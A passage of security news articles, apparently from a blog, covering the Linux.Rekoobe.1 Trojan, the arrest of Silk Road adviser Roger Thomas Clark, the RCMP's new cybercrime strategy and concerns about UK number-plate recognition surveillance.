“Nevertheless, Linux.Rekoobe.1 can execute only three commands such as: to download or upload files, to send the received commands to the Linux interpreter, and to transmit the output to the remote server—thus, cybercriminals are able to interact with the compromised device remotely.”

Unfortunately, the authors of Rekoobe have already ported the Trojan to other operating systems, including Android, Mac OS X and Windows.

Although many users consider Linux systems immune to malware, other threats have recently been discovered, such as the Linux.Encoder.1 ransomware.

The senior advisor behind Silk Road has been arrested

Roger Thomas Clark, the alleged mentor of Ross Ulbricht, the owner of the most popular black market Silk Road, has been arrested in Thailand.
The alleged mentor of Ross Ulbricht, the owner of the most popular black market Silk Road, has been arrested in Thailand and charged with conspiring to traffic drugs and money laundering.

Roger Thomas Clark (54) is accused of being the mind behind Silk Road; he served as a senior advisor and mentor to Ross Ulbricht.


The US Department of Justice (DoJ) announced yesterday that Clark is charged with being “Variety Jones,” a key figure of the dark marketplace.

Clark was arrested Thursday and is now awaiting extradition to face United States charges of Narcotics Trafficking Conspiracy and Money Laundering Conspiracy; he faces a possible sentence of life imprisonment.

Roger Thomas Clark was a close collaborator of Ross Ulbricht who reported to him on all Silk Road activities and helped Ulbricht advertise the black market in the criminal underground.

The founder, Ulbricht, also known as ‘Dread Pirate Roberts’, was arrested in San Francisco; he was reportedly in possession of 26,000 bitcoins with an estimated market value of $3.6 million USD.

After the arrest, Roger Thomas Clark, aka Variety Jones, disappeared.

The Manhattan U.S. Attorney announced the arrest in a press release that refers to Clark as the “Senior Adviser to the Operator Of The “Silk Road” Website.”

According to the press release, Clark used a number of online aliases, including Variety Jones, Cimon, and Plural of Mongoose, and was paid “hundreds of thousands of dollars” for his work on the Silk Road.

“CLARK, who went by the online nicknames “Variety Jones,” “VJ,” “Cimon,” and “Plural of Mongoose,” was described by Ulbricht as a trusted “mentor,” who regularly advised him on the management of the Silk Road enterprise. Among other things, CLARK counseled Ulbricht on the improvement and expansion of Silk Road’s technical infrastructure, including helping Ulbricht hire and manage a computer programmer to assist with these projects.” reads the press release. “CLARK also helped Ulbricht develop and enforce the rules governing how Silk Road vendors and users could do business on the site, which were designed to maximize the commissions that Ulbricht received from Silk Road sales. CLARK further advised Ulbricht on how to conceal his involvement in, and hide his profits from, the operation of Silk Road, including helping Ulbricht devise cover stories to tell others and make plans to obtain foreign citizenship and offshore bank accounts. Finally, CLARK also advised Ulbricht on tactics to thwart efforts by law enforcement to investigate Silk Road.”

The full press release of U.S. v. Clark, 15-mj-01335, U.S. District Court, Southern District of New York (Manhattan) is available online.

Clark and Ulbricht used intimidation and violence to maintain control of the Silk Road support staff, discouraging them from cooperating with law enforcement.

Prosecutors also reported an online conversation in which Clark and Ulbricht discussed plans to “track down” a certain Silk Road employee to ensure that he hadn’t gone “off the rails.” Clark reportedly commented: “Dude, we’re criminal drug dealers – what line shouldn’t we cross?”

“In one such conversation, in which CLARK and Ulbricht discussed “track[ing] down” a certain Silk Road employee to ensure that he had not gone “[o]ff the rails,” CLARK commented, “[D]ude, we’re criminal drug dealers – what line shouldn’t we cross?””

The operation that led to the arrest of Roger Thomas Clark is another success for law enforcement, which identified him even though he had adopted countermeasures to stay under the radar.

“The arrest of Roger Thomas Clark shows again that conducting criminal activities on the Dark Web does not keep a criminal out of law enforcement’s reach,” said Diego Rodriguez, FBI assistant director.

“Clark may have thought residing in Thailand would keep him out of reach of U.S authorities, but our international partnerships have proven him wrong. We thank our law enforcement partners who have worked with the FBI on this case.”

RCMP Cybercrime Strategy to fight online crimes

The RCMP Cybercrime Strategy aims to improve Canada’s national police force in its fight against the rising and evolving threat of cybercrime.
Canadian authorities consider online crimes a serious threat to homeland security. Law enforcement has tried several times to identify members of hacking crews like Anonymous, but in many cases the investigations have not produced satisfactory results.

The Canadian law enforcement agency, the Royal Canadian Mounted Police, plans to set up a special cybercrime unit to tackle online threats to Canada’s “political, economic, and social integrity.”

The Royal Canadian Mounted Police revealed its four-year action plan this week. The force plans to recruit cyber specialists, acquire new tools for data analysis and build better relationships with other law enforcement agencies worldwide.

“The RCMP Cybercrime Strategy is based on extensive internal and external consultation and focuses on ways to improve Canada’s national police force in its fight against the rising and evolving threat of cybercrime.”
The new unit will be based in Ottawa and it will be tasked to “investigate the most significant threats to Canada’s political, economic, and social integrity that would negatively affect Canada’s reputation and economy.”

[The team] “will have the capacity to target cyber-related criminal activity targeting the federal government, national critical infrastructure, and key business assets.”

The Canadian Government has revealed that its systems are under unceasing attack; earlier this year, hacktivists accessed documents pertaining to the technology infrastructure at the Canadian Security Intelligence Service’s foreign bureaus.

In many cases, hackers have targeted government websites with DDoS attacks in retaliation for government legislation.

The Royal Canadian Mounted Police considers the establishment of its cyber unit strategic.

“The team will enhance the RCMP’s ability to combat cybercrime-related offences where technology plays an integral role, such as investigating the unauthorized use of computers, mischief in relation to data, or the possession of a device to commit unauthorized computer use or data mischief,” the plan reads.

Vice News reported a statement by Jeff Adam, Chief Superintendent with the Royal Canadian Mounted Police, who explained the difficulties law enforcement faces when dealing with online crime.

“Insofar as the apparent, as you say, lack of outcomes,” Adam said on a conference call presenting the action plan. “Cybercrime investigations, starting off, can involve encryption, the darknet, multinational jurisdictions — and, many times, many different national jurisdictions — and it is a complex and time-consuming task to both identify, gather the evidence on, and to bring those people into the realm of justice.

“And while there might not be, apparently, anything happening, this is not as simple as catching the car speeding down the street,” he said. “This is infinitely more complex and requires a whole new way of doing business.”

Darknet and encrypted communications complicate investigations; RCMP Commissioner Bob Paulson expressed his frustration with encryption at a security conference in November.

“It’s a very difficult proposition to bring traditional criminal justice strategies to bear in a place where anonymity is protected,” Paulson said. “We’re chasing the wrong Holy Grail. I am all for new legislation, I am all for warrantless access to subscriber info.”

But privacy advocates and activists consider encryption a pillar of freedom of expression on the Internet.

“The intelligence services of the world claim that encryption is a problem,” said Jacob Appelbaum at the recent World Forum for Democracy conference. “But the evidence has come out that, in fact, the attacks in Paris were perpetrated by people who used credit cards in their real name, who used unencrypted text messages to say things like ‘let’s go.'”

Unfortunately, some are exploiting recent dramatic events like the Paris attacks to argue for online surveillance, but the Canadian Liberal government seems to have a different policy on online monitoring.

UK ANPR systems are one of the ‘world’s biggest surveillance systems’

The automatic number plate recognition systems (ANPR) used by the UK police are one of the largest surveillance systems in the world.
When dealing with surveillance systems, most people imagine skilled hackers breaking into their computers or communication lines in order to spy on specific targets.

The situation is quite different: we are surrounded by a number of systems that collect an impressive amount of data that could be used to spy on us.

If you are a Briton, for example, you should know that your country makes widespread use of automatic number plate recognition systems (ANPR). These systems are used by UK law enforcement and are considered one of the largest surveillance systems in the world. The principal problem with the use of automatic number plate recognition systems is the absence of a legal framework that regulates their usage.


During a speech at Stirling University, the UK’s surveillance camera commissioner Tony Porter raised the issue of the usage of automatic number plate recognition systems in the UK.

In the UK there are currently 8,300 ANPR cameras that every day collect data for 25-35 million ‘reads.’ These records are sent to the National ANPR Data Centre, but there is no legal framework governing this process, which clearly represents mass data collection.

“ANPR in the UK must surely be one of the largest data gatherers of its citizens in the world,” Porter said. “I would like to put forward that the use of ANPR cameras has an extremely unsteady legal framework.”

The UK Government considers automatic number plate recognition systems just one of the data sources available to law enforcement and, for this reason, holds that they don’t need to be regulated.

I sincerely don’t think so: the ANPR systems of the country belong to one of the most powerful “non-military” surveillance networks and need to be clearly regulated. Aspects related to data management, data access and their protection have to be shared with UK citizens.

“I am not 100 percent clear on this and when I’ve spoken to the Home Office they’ve informed me that ANPR is just another tool in the policing toolkit and does not require a statutory authority,” added Porter.

“So, as long as National ANPR Standards and Procedures offers sufficient safeguards to protect against the article 8 right against intrusion into privacy any legal challenge is set to fail. Or is it?”

“But who gave their consent to this? Where is the legislation, and where was the debate in parliament? So I argue that some forms of surveillance have no legislative framework whatsoever,” he added.

Porter’s position is supported by Daniel Nesbitt, research director of Big Brother Watch, who argues for the need to open a debate on the usage of number plate recognition systems.

“Although ANPR was first installed to tackle specific issues with 350 images now being captured every second it is impossible for motorists to travel without having their details captured and stored, regardless of whether or not they are doing anything wrong,” explained Daniel Nesbitt.

“An open and honest debate about how this technology is being used as well as how far it invades the privacy of ordinary motorists is now long overdue. For starters we need to see regular reports being published on how the system is being run and exactly what safeguards can be put in place to protect the public.”

When dealing with surveillance systems, especially civil ones, I’m always worried about the effective level of security they implement. A persistent attacker could breach them, accessing an impressive amount of data that could be used to harm homeland security. I believe that the security of these systems must also be regulated in a legal framework to protect citizens.